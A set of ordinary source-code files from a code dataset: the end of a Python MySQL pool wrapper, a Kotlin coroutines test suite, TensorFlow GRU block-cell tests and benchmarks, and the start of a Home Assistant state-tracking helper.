        # Pool-creation errors propagate to the caller unchanged (the old
        # `except Exception: raise` wrapper was a no-op and was removed).
        self.__conn_pool = MySQLConnectionPool(**dbconfig)

    def __get_session(self):
        """Return a connection checked out from the private pool."""
        return self.__conn_pool.get_connection()

    def __cant_set(self, _value=None):
        """Raise RuntimeError; used as the setter of read-only properties.

        BUG FIX: a property setter is called as fset(self, value); without
        the extra parameter, assignment raised TypeError instead of the
        intended RuntimeError.
        """
        raise RuntimeError("Private property cannot be set.")

    def __cant_get(self):
        """Raise RuntimeError; used as the getter of a hidden property."""
        raise RuntimeError("Cannot get protected property.")

    # db_conn is fully protected; session exposes pooled connections read-only.
    db_conn = property(__cant_get, __cant_set)
    session = property(__get_session, __cant_set)
|
unknown
|
codeparrot/codeparrot-clean
| ||
package kotlinx.coroutines.test
import kotlinx.coroutines.*
import kotlinx.coroutines.channels.*
import kotlinx.coroutines.flow.*
import kotlinx.coroutines.testing.*
import kotlin.test.*
import kotlin.test.assertFailsWith
/** Copy of [RunTestTest], but for [runBlockingTestOnTestScope], where applicable. */
@Suppress("DEPRECATION", "DEPRECATION_ERROR")
class RunBlockingTestOnTestScopeTest {

    // Contexts the test framework cannot control must be rejected up front.
    @Test
    fun testRunTestWithIllegalContext() {
        for (ctx in TestScopeTest.invalidContexts) {
            assertFailsWith<IllegalArgumentException> {
                runBlockingTestOnTestScope(ctx) { }
            }
        }
    }

    @Test
    fun testThrowingInRunTestBody() {
        assertFailsWith<RuntimeException> {
            runBlockingTestOnTestScope {
                throw RuntimeException()
            }
        }
    }

    // A failure in a still-pending child task must surface from the runner.
    @Test
    fun testThrowingInRunTestPendingTask() {
        assertFailsWith<RuntimeException> {
            runBlockingTestOnTestScope {
                launch {
                    delay(SLOW)
                    throw RuntimeException()
                }
            }
        }
    }

    @Test
    fun reproducer2405() = runBlockingTestOnTestScope {
        val dispatcher = StandardTestDispatcher(testScheduler)
        var collectedError = false
        withContext(dispatcher) {
            flow { emit(1) }
                .combine(
                    flow<String> { throw IllegalArgumentException() }
                ) { int, string -> int.toString() + string }
                .catch { emit("error") }
                .collect {
                    assertEquals("error", it)
                    collectedError = true
                }
        }
        assertTrue(collectedError)
    }

    // A test-body failure must cancel coroutines launched inside the scope.
    @Test
    fun testChildrenCancellationOnTestBodyFailure() {
        var job: Job? = null
        assertFailsWith<AssertionError> {
            runBlockingTestOnTestScope {
                job = launch {
                    while (true) {
                        delay(1000)
                    }
                }
                throw AssertionError()
            }
        }
        assertTrue(job!!.isCancelled)
    }

    @Test
    fun testTimeout() {
        assertFailsWith<TimeoutCancellationException> {
            runBlockingTestOnTestScope {
                withTimeout(50) {
                    launch {
                        delay(1000)
                    }
                }
            }
        }
    }

    @Test
    fun testRunTestThrowsRootCause() {
        assertFailsWith<TestException> {
            runBlockingTestOnTestScope {
                launch {
                    throw TestException()
                }
            }
        }
    }

    @Test
    fun testCompletesOwnJob() {
        var handlerCalled = false
        runBlockingTestOnTestScope {
            coroutineContext.job.invokeOnCompletion {
                handlerCalled = true
            }
        }
        assertTrue(handlerCalled)
    }

    // A caller-supplied Job must stay alive after the test scope finishes.
    @Test
    fun testDoesNotCompleteGivenJob() {
        var handlerCalled = false
        val job = Job()
        job.invokeOnCompletion {
            handlerCalled = true
        }
        runBlockingTestOnTestScope(job) {
            assertTrue(coroutineContext.job in job.children)
        }
        assertFalse(handlerCalled)
        assertEquals(0, job.children.filter { it.isActive }.count())
    }

    // All failures beyond the first must be attached as suppressed exceptions
    // (possibly nested one level deep).
    @Test
    fun testSuppressedExceptions() {
        try {
            runBlockingTestOnTestScope {
                launch(SupervisorJob()) { throw TestException("x") }
                launch(SupervisorJob()) { throw TestException("y") }
                launch(SupervisorJob()) { throw TestException("z") }
                throw TestException("w")
            }
            fail("should not be reached")
        } catch (e: TestException) {
            assertEquals("w", e.message)
            val suppressed = e.suppressedExceptions +
                (e.suppressedExceptions.firstOrNull()?.suppressedExceptions ?: emptyList())
            assertEquals(3, suppressed.size)
            assertEquals("x", suppressed[0].message)
            assertEquals("y", suppressed[1].message)
            assertEquals("z", suppressed[2].message)
        }
    }

    @Test
    fun testScopeRunTestExceptionHandler(): TestResult {
        val scope = TestCoroutineScope()
        return testResultMap({
            try {
                it()
                fail("should not be reached")
            } catch (e: TestException) {
                // expected
            }
        }) {
            scope.runTest {
                launch(SupervisorJob()) { throw TestException("x") }
            }
        }
    }

    @Test
    fun testBackgroundWorkBeingRun() = runBlockingTestOnTestScope {
        var i = 0
        var j = 0
        backgroundScope.launch {
            yield()
            ++i
        }
        backgroundScope.launch {
            yield()
            delay(10)
            ++j
        }
        assertEquals(0, i)
        assertEquals(0, j)
        delay(1)
        assertEquals(1, i)
        assertEquals(0, j)
        delay(10)
        assertEquals(1, i)
        assertEquals(1, j)
    }

    @Test
    fun testBackgroundWorkCancelled() {
        var cancelled = false
        runBlockingTestOnTestScope {
            var i = 0
            backgroundScope.launch {
                yield()
                try {
                    while (isActive) {
                        ++i
                        yield()
                    }
                } catch (e: CancellationException) {
                    cancelled = true
                }
            }
            repeat(5) {
                assertEquals(i, it)
                yield()
            }
        }
        assertTrue(cancelled)
    }

    @Test
    fun testBackgroundWorkTimeControl(): TestResult = runBlockingTestOnTestScope {
        var i = 0
        var j = 0
        backgroundScope.launch {
            yield()
            while (true) {
                ++i
                delay(100)
            }
        }
        backgroundScope.launch {
            yield()
            while (true) {
                ++j
                delay(50)
            }
        }
        advanceUntilIdle() // should do nothing, as only background work is left.
        assertEquals(0, i)
        assertEquals(0, j)
        val job = launch {
            delay(1)
            // the background work scheduled for earlier gets executed before the normal work scheduled for later does
            assertEquals(1, i)
            assertEquals(1, j)
        }
        job.join()
        advanceTimeBy(199) // should work the same for the background tasks
        assertEquals(2, i)
        assertEquals(4, j)
        advanceUntilIdle() // once again, should do nothing
        assertEquals(2, i)
        assertEquals(4, j)
        runCurrent() // should behave the same way as for the normal work
        assertEquals(3, i)
        assertEquals(5, j)
        launch {
            delay(1001)
            assertEquals(13, i)
            assertEquals(25, j)
        }
        advanceUntilIdle() // should execute the normal work, and with that, the background one, too
    }

    @Test
    fun testBackgroundWorkErrorReporting() {
        var testFinished = false
        val exception = RuntimeException("x")
        try {
            runBlockingTestOnTestScope {
                backgroundScope.launch {
                    throw exception
                }
                delay(1000)
                testFinished = true
            }
            fail("unreached")
        } catch (e: Throwable) {
            assertSame(e, exception)
            assertTrue(testFinished)
        }
    }

    // Background tasks must all be finalized on teardown, with at most the
    // first few finalization failures reported as suppressed exceptions.
    @Test
    fun testBackgroundWorkFinalizing() {
        var taskEnded = 0
        val nTasks = 10
        try {
            runBlockingTestOnTestScope {
                repeat(nTasks) {
                    backgroundScope.launch {
                        try {
                            while (true) {
                                delay(1)
                            }
                        } finally {
                            ++taskEnded
                            if (taskEnded <= 2)
                                throw TestException()
                        }
                    }
                }
                delay(100)
                throw TestException()
            }
            fail("unreached")
        } catch (e: TestException) {
            assertEquals(2, e.suppressedExceptions.size)
            assertEquals(nTasks, taskEnded)
        }
    }

    @Test
    fun testExampleBackgroundJob1() = runBlockingTestOnTestScope {
        val myFlow = flow {
            yield()
            var i = 0
            while (true) {
                emit(++i)
                delay(1)
            }
        }
        val stateFlow = myFlow.stateIn(backgroundScope, SharingStarted.Eagerly, 0)
        var j = 0
        repeat(100) {
            assertEquals(j++, stateFlow.value)
            delay(1)
        }
    }

    @Test
    fun testExampleBackgroundJob2() = runBlockingTestOnTestScope {
        val channel = Channel<Int>()
        backgroundScope.launch {
            var i = 0
            while (true) {
                channel.send(i++)
            }
        }
        repeat(100) {
            assertEquals(it, channel.receive())
        }
    }

    @Test
    fun testAsyncFailureInBackgroundReported() =
        try {
            runBlockingTestOnTestScope {
                backgroundScope.async {
                    throw TestException("x")
                }
                backgroundScope.produce<Unit> {
                    throw TestException("y")
                }
                delay(1)
                throw TestException("z")
            }
            fail("unreached")
        } catch (e: TestException) {
            assertEquals("z", e.message)
            assertEquals(setOf("x", "y"), e.suppressedExceptions.map { it.message }.toSet())
        }

    @Test
    fun testNoDuplicateExceptions() =
        try {
            runBlockingTestOnTestScope {
                backgroundScope.launch {
                    throw TestException("x")
                }
                delay(1)
                throw TestException("y")
            }
            fail("unreached")
        } catch (e: TestException) {
            assertEquals("y", e.message)
            assertEquals(listOf("x"), e.suppressedExceptions.map { it.message })
        }
}
|
kotlin
|
github
|
https://github.com/Kotlin/kotlinx.coroutines
|
kotlinx-coroutines-test/jvm/test/migration/RunBlockingTestOnTestScopeTest.kt
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Block GRU module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
from tensorflow.contrib.rnn.python.ops import core_rnn_cell_impl
from tensorflow.contrib.rnn.python.ops import gru_ops
from tensorflow.python.client import session
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
class GRUBlockCellTest(test.TestCase):
_use_gpu = False
  def testNoneDimsWithDynamicRNN(self):
    """dynamic_rnn over a GRUBlockCell must accept unknown time/batch dims."""
    with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
      batch_size = 4
      cell_size = 5
      input_size = 6
      num_steps = 7
      cell = gru_ops.GRUBlockCell(cell_size)
      # Only the innermost (feature) dimension is statically known.
      x = array_ops.placeholder(dtypes.float32, shape=(None, None, input_size))
      _, output = rnn.dynamic_rnn(
          cell, x, time_major=True, dtype=dtypes.float32)
      sess.run(variables.global_variables_initializer())
      feed = {}
      feed[x] = np.random.randn(num_steps, batch_size, input_size)
      # Succeeds as long as the graph runs; no value assertions needed.
      sess.run(output, feed)
  def testBlockGRUToGRUCellSingleStep(self):
    """One step of GRUBlockCell must match the basic GRUCell numerically."""
    with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
      batch_size = 4
      cell_size = 5
      input_size = 6
      # Same seeded initializer for both variable scopes so the two cells
      # start from identical weights.
      seed = 1994
      initializer = init_ops.random_uniform_initializer(-0.01, 0.01, seed=seed)
      # Inputs
      x = array_ops.zeros([batch_size, input_size])
      h = array_ops.zeros([batch_size, cell_size])
      # Values for the inputs.
      x_value = np.random.rand(batch_size, input_size)
      h_value = np.random.rand(batch_size, cell_size)
      # Output from the basic GRU cell implementation.
      with vs.variable_scope("basic", initializer=initializer):
        output = core_rnn_cell_impl.GRUCell(cell_size)(x, h)
        sess.run([variables.global_variables_initializer()])
        basic_res = sess.run([output], {x: x_value, h: h_value})
      # Output from the block GRU cell implementation.
      with vs.variable_scope("block", initializer=initializer):
        output = gru_ops.GRUBlockCell(cell_size)(x, h)
        sess.run([variables.global_variables_initializer()])
        block_res = sess.run([output], {x: x_value, h: h_value})
      self.assertEqual(len(block_res), len(basic_res))
      for block, basic in zip(block_res, basic_res):
        self.assertAllClose(block, basic)
def testBlockGRUToGRUCellMultiStep(self):
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
batch_size = 2
cell_size = 3
input_size = 3
time_steps = 4
# Random initializers.
seed = 1994
initializer = init_ops.random_uniform_initializer(-0.01, 0.01, seed=seed)
np.random.seed(seed)
# Inputs
concat_x = array_ops.placeholder(
dtypes.float32, shape=(time_steps, batch_size, input_size))
h = array_ops.zeros([batch_size, cell_size])
# Values for the inputs.
x_values = np.random.rand(time_steps, batch_size, input_size)
h_value = np.random.rand(batch_size, cell_size)
# Output from the block GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
cell = gru_ops.GRUBlockCell(cell_size)
outputs_dynamic, state_dynamic = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
feeds = {concat_x: x_values, h: h_value}
sess.run([variables.global_variables_initializer()])
block_res = sess.run([outputs_dynamic, state_dynamic], feeds)
# Output from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
cell = core_rnn_cell_impl.GRUCell(cell_size)
outputs_dynamic, state_dynamic = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
feeds = {concat_x: x_values, h: h_value}
sess.run([variables.global_variables_initializer()])
basic_res = sess.run([outputs_dynamic, state_dynamic], feeds)
# Check the lengths of the outputs_dynamic, and states.
self.assertEqual(len(block_res), len(basic_res))
self.assertEqual(len(block_res[0]), len(basic_res[0]))
self.assertEqual(len(block_res[1]), len(basic_res[1]))
# Check the outputs_dynamic values.
for block_output, basic_output in zip(block_res[0], basic_res[0]):
self.assertAllClose(block_output, basic_output)
# Check the state_dynamic value.
self.assertAllClose(block_res[1], block_res[1])
def testDerivativeOfBlockGRUToGRUCellSingleStep(self):
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
batch_size = 2
cell_size = 3
input_size = 4
seed = 1994
initializer = init_ops.random_uniform_initializer(-0.01, 0.01, seed=seed)
np.random.seed(seed)
# Inputs
x = array_ops.zeros([batch_size, input_size])
h = array_ops.zeros([batch_size, cell_size])
# Values for the inputs.
x_value = np.random.rand(batch_size, input_size)
h_value = np.random.rand(batch_size, cell_size)
# Gradients from the block GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
output = gru_ops.GRUBlockCell(cell_size)(x, h)
sess.run([variables.global_variables_initializer()])
all_variables = variables.global_variables()[0:4]
[w_ru, b_ru, w_c, b_c] = all_variables
d_new_h_wrt_x = gradients_impl.gradients([output], x)
d_new_h_wrt_h = gradients_impl.gradients([output], h)
d_new_h_wrt_w_ru = gradients_impl.gradients([output], w_ru)
d_new_h_wrt_w_c = gradients_impl.gradients([output], w_c)
d_new_h_wrt_b_ru = gradients_impl.gradients([output], b_ru)
d_new_h_wrt_b_c = gradients_impl.gradients([output], b_c)
d_block_res = sess.run([
d_new_h_wrt_x, d_new_h_wrt_h, d_new_h_wrt_w_ru, d_new_h_wrt_w_c,
d_new_h_wrt_b_ru, d_new_h_wrt_b_c
], {x: x_value,
h: h_value})
# Gradients from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
output = core_rnn_cell_impl.GRUCell(cell_size)(x, h)
sess.run([variables.global_variables_initializer()])
all_variables = variables.global_variables()[4:8]
[w_ru, b_ru, w_c, b_c] = all_variables
d_new_h_wrt_x = gradients_impl.gradients([output], x)
d_new_h_wrt_h = gradients_impl.gradients([output], h)
d_new_h_wrt_w_ru = gradients_impl.gradients([output], w_ru)
d_new_h_wrt_w_c = gradients_impl.gradients([output], w_c)
d_new_h_wrt_b_ru = gradients_impl.gradients([output], b_ru)
d_new_h_wrt_b_c = gradients_impl.gradients([output], b_c)
d_basic_res = sess.run([
d_new_h_wrt_x, d_new_h_wrt_h, d_new_h_wrt_w_ru, d_new_h_wrt_w_c,
d_new_h_wrt_b_ru, d_new_h_wrt_b_c
], {x: x_value,
h: h_value})
# Check lengths of derivative results.
self.assertEqual(len(d_block_res), len(d_basic_res))
# Check the value of every derivative result.
for block, basic in zip(d_block_res, d_basic_res):
self.assertAllClose(block, basic)
def testDerivativeOfBlockGRUToGRUCellMultiSteps(self):
batch_size = 2
cell_size = 3
input_size = 4
time_steps = 2
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
# Random initializers.
seed = 1994
initializer = init_ops.random_uniform_initializer(-0.01, 0.01, seed=seed)
np.random.seed(seed)
# Inputs
concat_x = array_ops.placeholder(
dtypes.float32, shape=(time_steps, batch_size, input_size))
h = array_ops.zeros([batch_size, cell_size])
# Values for the inputs.
x_values = np.random.rand(time_steps, batch_size, input_size)
h_value = np.random.rand(batch_size, cell_size)
feeds = {concat_x: x_values, h: h_value}
# Gradients from the block GRU cell implementation.
with vs.variable_scope("block", initializer=initializer):
cell = gru_ops.GRUBlockCell(cell_size)
outputs_dynamic, _ = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
grad_output_wrt_x = gradients_impl.gradients([outputs_dynamic[0]],
concat_x)
grad_output_wrt_h = gradients_impl.gradients([outputs_dynamic[0]], h)
sess.run([variables.global_variables_initializer()])
block_grad_res_x, block_grad_res_h = sess.run(
[grad_output_wrt_x, grad_output_wrt_h], feeds)
# Gradients from the basic GRU cell implementation.
with vs.variable_scope("basic", initializer=initializer):
cell = core_rnn_cell_impl.GRUCell(cell_size)
outputs_dynamic, _ = rnn.dynamic_rnn(
cell,
inputs=concat_x,
initial_state=h,
time_major=True,
dtype=dtypes.float32)
grad_output_wrt_x = gradients_impl.gradients([outputs_dynamic[0]],
concat_x)
grad_output_wrt_h = gradients_impl.gradients([outputs_dynamic[0]], h)
sess.run([variables.global_variables_initializer()])
basic_grad_res_x, basic_grad_res_h = sess.run(
[grad_output_wrt_x, grad_output_wrt_h], feeds)
# Check derivatives values of the outputs wrt to x.
self.assertEqual(len(block_grad_res_x), len(basic_grad_res_x))
# Check derivatives values of the outputs wrt to h.
for block, basic in zip(block_grad_res_x, basic_grad_res_x):
self.assertAllClose(block, basic)
# Check derivatives values of the outputs wrt to x.
self.assertEqual(len(block_grad_res_h), len(basic_grad_res_h))
# Check derivatives values of the outputs wrt to h.
for block, basic in zip(block_grad_res_h, basic_grad_res_h):
self.assertAllClose(block, basic)
def testGradient(self):
with self.test_session(use_gpu=self._use_gpu, graph=ops.Graph()) as sess:
batch_size = 1
cell_size = 3
input_size = 2
# Inputs
x = array_ops.zeros([batch_size, input_size])
h = array_ops.zeros([batch_size, cell_size])
output = gru_ops.GRUBlockCell(cell_size)(x, h)
sess.run([variables.global_variables_initializer()])
all_variables = variables.global_variables()
[w_ru, b_ru, w_c, b_c] = all_variables[:4]
error_x = gradient_checker.compute_gradient_error(
x, (batch_size, input_size), output[0], (batch_size, cell_size))
error_h = gradient_checker.compute_gradient_error(h,
(batch_size, cell_size),
output[0],
(batch_size, cell_size))
error_w_ru = gradient_checker.compute_gradient_error(
w_ru, (input_size + cell_size, 2 * cell_size), output[0],
(batch_size, cell_size))
error_w_c = gradient_checker.compute_gradient_error(
w_c, (input_size + cell_size, cell_size), output[0],
(batch_size, cell_size))
error_b_ru = gradient_checker.compute_gradient_error(
b_ru, (2 * cell_size,), output[0], (batch_size, cell_size))
error_b_c = gradient_checker.compute_gradient_error(
b_c, (cell_size,), output[0], (batch_size, cell_size))
eps = 1e-4
self.assertLess(error_x, eps)
self.assertLess(error_h, eps)
self.assertLess(error_w_ru, eps)
self.assertLess(error_w_c, eps)
self.assertLess(error_b_ru, eps)
self.assertLess(error_b_c, eps)
class GRUBlockCellGpuTest(GRUBlockCellTest):
  # Re-run every GRUBlockCellTest case with GPU placement requested.
  _use_gpu = True
#### Benchmarking GRUBlockCell vs GRUCell.
def time_taken_by_op(op, sess, num_runs=50):
  """Return wall-clock seconds spent running `op` `num_runs` times.

  The op is executed twice beforehand (untimed) so one-off setup costs
  don't pollute the measurement.
  """
  # Warm-up runs, excluded from timing.
  sess.run([op])
  sess.run([op])

  start = time.time()
  for _ in range(num_runs):
    sess.run([op])
  return time.time() - start
def training_gru_block_vs_gru_cell(batch_size,
                                   cell_size,
                                   input_size,
                                   time_steps,
                                   use_gpu=False,
                                   iters=30):
  """Benchmark training speed between GRUBlockCell vs GRUCell.

  Builds one SGD training step (MSE loss against a random target `y`)
  for each implementation in the same session and times `iters` runs of
  each optimizer op via time_taken_by_op.  Prints a CSV line with the
  parameters, timings and relative improvement.

  Returns:
    Tuple (basic_time_training, block_time_training) in seconds.
  """
  ops.reset_default_graph()
  with session.Session(graph=ops.Graph()) as sess:
    # Pin all ops to the requested device.
    with ops.device("/cpu:0" if not use_gpu else "/gpu:0"):
      # Random initializers.
      seed = 1994
      initializer = init_ops.random_uniform_initializer(-1, 1, seed=seed)
      np.random.seed(seed)

      # Inputs
      concat_x = vs.get_variable("concat_x",
                                 [time_steps, batch_size, input_size])
      h = vs.get_variable("h", [batch_size, cell_size])
      y = vs.get_variable("y", [time_steps, batch_size, cell_size])

      # Output from the basic GRU cell implementation.
      with vs.variable_scope("basic", initializer=initializer):
        cell = core_rnn_cell_impl.GRUCell(cell_size)

        outputs_dynamic, _ = rnn.dynamic_rnn(
            cell,
            inputs=concat_x,
            initial_state=h,
            time_major=True,
            dtype=dtypes.float32)
        sess.run([variables.global_variables_initializer()])
        cost = math_ops.reduce_mean(math_ops.square(outputs_dynamic - y))
        learning_rate = 0.01
        optimizer = gradient_descent.GradientDescentOptimizer(
            learning_rate).minimize(cost)

        # time for a training step.
        basic_time_training = time_taken_by_op(optimizer, sess, iters)

      # Output from the block GRU cell implementation.
      with vs.variable_scope("block", initializer=initializer):
        cell = gru_ops.GRUBlockCell(cell_size)

        outputs_dynamic, _ = rnn.dynamic_rnn(
            cell,
            inputs=concat_x,
            initial_state=h,
            time_major=True,
            dtype=dtypes.float32)
        sess.run([variables.global_variables_initializer()])
        cost = math_ops.reduce_mean(math_ops.square(outputs_dynamic - y))
        learning_rate = 0.01
        optimizer = gradient_descent.GradientDescentOptimizer(
            learning_rate).minimize(cost)

        # time for a training step.
        block_time_training = time_taken_by_op(optimizer, sess, iters)

    # Relative improvement of the block kernel over the basic cell, in %.
    performance_training = (
        basic_time_training - block_time_training) * 100 / basic_time_training

    print(",".join([
        str(batch_size), str(cell_size), str(input_size), str(time_steps), str(
            use_gpu), str(basic_time_training), str(block_time_training), str(
                performance_training)
    ]))

  return basic_time_training, block_time_training
def inference_gru_block_vs_gru_cell(batch_size,
                                    cell_size,
                                    input_size,
                                    time_steps,
                                    use_gpu=False,
                                    iters=30):
  """Benchmark inference speed between GRUBlockCell vs GRUCell.

  Times `iters` runs of a forward dynamic_rnn pass for each
  implementation and prints a CSV line with the parameters, timings and
  relative improvement.

  Returns:
    Tuple (basic_time_inference, block_time_inference) in seconds.
  """
  ops.reset_default_graph()
  with session.Session(graph=ops.Graph()) as sess:
    # Pin all ops to the requested device.
    with ops.device("/cpu:0" if not use_gpu else "/gpu:0"):
      # Random initializers.
      seed = 1994
      initializer = init_ops.random_uniform_initializer(-1, 1, seed=seed)
      np.random.seed(seed)

      # Inputs
      concat_x = vs.get_variable("concat_x",
                                 [time_steps, batch_size, input_size])
      h = vs.get_variable("h", [batch_size, cell_size])

      # Output from the basic GRU cell implementation.
      with vs.variable_scope("basic", initializer=initializer):
        cell = core_rnn_cell_impl.GRUCell(cell_size)
        outputs_dynamic, _ = rnn.dynamic_rnn(
            cell,
            inputs=concat_x,
            initial_state=h,
            time_major=True,
            dtype=dtypes.float32)
        sess.run([variables.global_variables_initializer()])
        basic_time_inference = time_taken_by_op(outputs_dynamic, sess, iters)

      # Output from the block GRU cell implementation.
      with vs.variable_scope("block", initializer=initializer):
        cell = gru_ops.GRUBlockCell(cell_size)
        outputs_dynamic, _ = rnn.dynamic_rnn(
            cell,
            inputs=concat_x,
            initial_state=h,
            time_major=True,
            dtype=dtypes.float32)
        sess.run([variables.global_variables_initializer()])
        block_time_inference = time_taken_by_op(outputs_dynamic, sess, iters)

    # Relative improvement of the block kernel over the basic cell, in %.
    performance_inference = (basic_time_inference - block_time_inference
                            ) * 100 / basic_time_inference
    print(",".join([
        str(batch_size), str(cell_size), str(input_size), str(time_steps), str(
            use_gpu), str(basic_time_inference), str(block_time_inference), str(
                performance_inference)
    ]))

  return basic_time_inference, block_time_inference
def single_bprop_step_gru_block_vs_gru_cell(batch_size,
                                            cell_size,
                                            input_size,
                                            use_gpu=False,
                                            iters=30):
  """Benchmark single bprop step speed between GRUBlockCell vs GRUCell.

  Times the gradient of a single cell invocation w.r.t. the state `h`
  for each implementation and prints a CSV line with the results.

  Returns:
    Tuple (basic_time_bprop, block_time_bprop) in seconds.
  """
  ops.reset_default_graph()
  with session.Session(graph=ops.Graph()) as sess:
    with ops.device("/cpu:0" if not use_gpu else "/gpu:0"):
      initializer = init_ops.random_uniform_initializer(-1, 1, seed=1989)
      # Inputs
      x = vs.get_variable("x", [batch_size, input_size])
      h = vs.get_variable("h", [batch_size, cell_size])

      # Output from the basic GRU cell implementation.
      with vs.variable_scope("basic", initializer=initializer):
        # identity() decouples the variables from the cell's graph inputs.
        output = core_rnn_cell_impl.GRUCell(cell_size)(array_ops.identity(x),
                                                       array_ops.identity(h))
        sess.run([variables.global_variables_initializer()])
        grad_output_wrt_input = gradients_impl.gradients([output], h)
        basic_time_bprop = time_taken_by_op(grad_output_wrt_input, sess, iters)

      # Output from the block GRU cell implementation.
      with vs.variable_scope("block", initializer=initializer):
        output = gru_ops.GRUBlockCell(cell_size)(array_ops.identity(x),
                                                 array_ops.identity(h))
        sess.run([variables.global_variables_initializer()])
        grad_output_wrt_input = gradients_impl.gradients([output], h)
        block_time_bprop = time_taken_by_op(grad_output_wrt_input, sess, iters)

  # Relative improvement of the block kernel over the basic cell, in %.
  performance_inference = (
      basic_time_bprop - block_time_bprop) * 100 / basic_time_bprop

  print(",".join([
      str(batch_size), str(cell_size), str(input_size), str(use_gpu), str(
          basic_time_bprop), str(block_time_bprop), str(performance_inference)
  ]))

  return basic_time_bprop, block_time_bprop
class BenchmarkGRUBlock(test.Benchmark):
  """Reports training/inference/bprop timings for GRUBlockCell vs GRUCell."""

  def benchmarkTrainingBlockGRUVsGRUCell(self):
    """Times one SGD training step for both cell implementations."""
    print("Comparison GRUBlockCell vs GRUCell")
    print("--------------------------------------------------------------")
    print("Training speed GRUBlockCell vs GRUCell")
    print("batch_size, cell_size, input_size, time_steps, GPU, "
          "basic_time_training, block_time_training, performance_training[%]")
    iters = 10
    # Cartesian parameter grid, same order as nested loops would produce.
    grid = [(gpu, bs, cs, ins, ts)
            for gpu in [True, False]
            for bs in [1, 32, 128]
            for cs in [128, 512]
            for ins in [128, 512]
            for ts in [50]]
    for use_gpu, batch_size, cell_size, input_size, time_steps in grid:
      basic_time, block_time = training_gru_block_vs_gru_cell(
          batch_size, cell_size, input_size, time_steps, use_gpu, iters)
      suffix = "BS%i_CS%i_IS%i_TS%i_gpu_%s" % (batch_size, cell_size,
                                               input_size, time_steps, use_gpu)
      self.report_benchmark(
          name="GRUCell_training_time_" + suffix,
          iters=iters,
          wall_time=basic_time)
      self.report_benchmark(
          name="GRUBlockCell_training_time_" + suffix,
          iters=iters,
          wall_time=block_time)

  def benchmarkInferenceBlockGRUVsGRUCell(self):
    """Times a forward dynamic_rnn pass for both cell implementations."""
    print("--------------------------------------------------------------")
    print("Inference speed GRUBlockCell vs GRUCell")
    print(
        "batch_size, cell_size, input_size, time_steps, GPU, "
        "basic_time_inference, block_time_inference, performance_inference[%]")
    iters = 10
    grid = [(gpu, bs, cs, ins, ts)
            for gpu in [True, False]
            for bs in [1, 32, 128]
            for cs in [128, 512]
            for ins in [128, 512]
            for ts in [50]]
    for use_gpu, batch_size, cell_size, input_size, time_steps in grid:
      basic_time, block_time = inference_gru_block_vs_gru_cell(
          batch_size, cell_size, input_size, time_steps, use_gpu, iters)
      suffix = "BS%i_CS%i_IS%i_TS%i_gpu_%s" % (batch_size, cell_size,
                                               input_size, time_steps, use_gpu)
      self.report_benchmark(
          name="GRUCell_inference_time_" + suffix,
          iters=iters,
          wall_time=basic_time)
      self.report_benchmark(
          name="GRUBlockCell_inference_time_" + suffix,
          iters=iters,
          wall_time=block_time)

  def benchmarkSingleBpropStepBlockGRUVsGRUCell(self):
    """Times the gradient of one cell step for both implementations."""
    print("--------------------------------------------------------------")
    print("Single bprop step speed GRUBlockCell vs GRUCell")
    print("batch_size, cell_size, input_size, GPU, basic_time, "
          "block_time, performance_inference[%]")
    iters = 10
    grid = [(gpu, bs, cs, ins)
            for gpu in [True, False]
            for bs in [1, 32, 128]
            for cs in [128, 512]
            for ins in [128, 512]]
    for use_gpu, batch_size, cell_size, input_size in grid:
      basic_time, block_time = single_bprop_step_gru_block_vs_gru_cell(
          batch_size, cell_size, input_size, use_gpu, iters)
      suffix = "BS%i_CS%i_IS%i_gpu_%s" % (batch_size, cell_size, input_size,
                                          use_gpu)
      self.report_benchmark(
          name="GRUCell_Bprop_single_step_time_" + suffix,
          iters=iters,
          wall_time=basic_time)
      self.report_benchmark(
          name="GRUBlockCell_Bprop_single_step_time_" + suffix,
          iters=iters,
          wall_time=block_time)
    print("--------------------------------------------------------------")
if __name__ == "__main__":
  # Runs the GRUBlockCellTest / GRUBlockCellGpuTest cases defined above.
  test.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""
homeassistant.helpers.state
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Helpers that help with state related things.
"""
import logging
from homeassistant import State
import homeassistant.util.dt as dt_util
from homeassistant.const import (
STATE_ON, STATE_OFF, SERVICE_TURN_ON, SERVICE_TURN_OFF, ATTR_ENTITY_ID)
_LOGGER = logging.getLogger(__name__)
# pylint: disable=too-few-public-methods, attribute-defined-outside-init
class TrackStates(object):
    """
    Record all state changes that happen inside a with-block.

    On entry the current UTC time is remembered and an (initially empty)
    list is returned; on exit every state that changed since that moment
    is appended to it.
    """

    def __init__(self, hass):
        self.hass = hass
        self.states = []

    def __enter__(self):
        self.now = dt_util.utcnow()
        return self.states

